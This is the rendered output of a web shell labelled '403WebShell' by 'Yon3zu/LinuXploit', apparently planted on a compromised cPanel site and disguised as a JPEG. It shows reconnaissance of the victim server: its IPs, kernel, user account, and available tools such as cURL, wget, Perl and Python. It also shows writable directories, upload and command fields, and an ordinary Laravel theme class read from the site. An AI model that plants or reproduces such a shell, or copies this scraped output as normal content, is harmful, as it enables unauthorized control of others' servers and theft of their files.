����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 18.118.19.89
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/builderbox/public_html/common/Admin/Appearance/Themes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/builderbox/public_html/common/Admin/Appearance/Themes/CrupdateCssTheme.php
<?php

namespace Common\Admin\Appearance\Themes;

use Auth;
use Illuminate\Support\Arr;

class CrupdateCssTheme
{
    /**
     * @var CssTheme
     */
    private $cssTheme;

    /**
     * @param CssTheme $cssTheme
     */
    public function __construct(CssTheme $cssTheme)
    {
        $this->cssTheme = $cssTheme;
    }

    /**
     * @param array $data
     * @param CssTheme $cssTheme
     * @return CssTheme
     */
    public function execute($data, $cssTheme = null)
    {
        if ( ! $cssTheme) {
            $cssTheme = $this->cssTheme->newInstance([
                'user_id' => Auth::id(),
                'colors' => $data['is_dark'] ? config('common.themes.dark') : config('common.themes.light')
            ]);
        }

        $attributes = Arr::only($data, [
            'name',
            'is_dark',
            'default_dark',
            'default_light',
            'colors',
        ]);

        $cssTheme->fill($attributes)->save();

        return $cssTheme;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit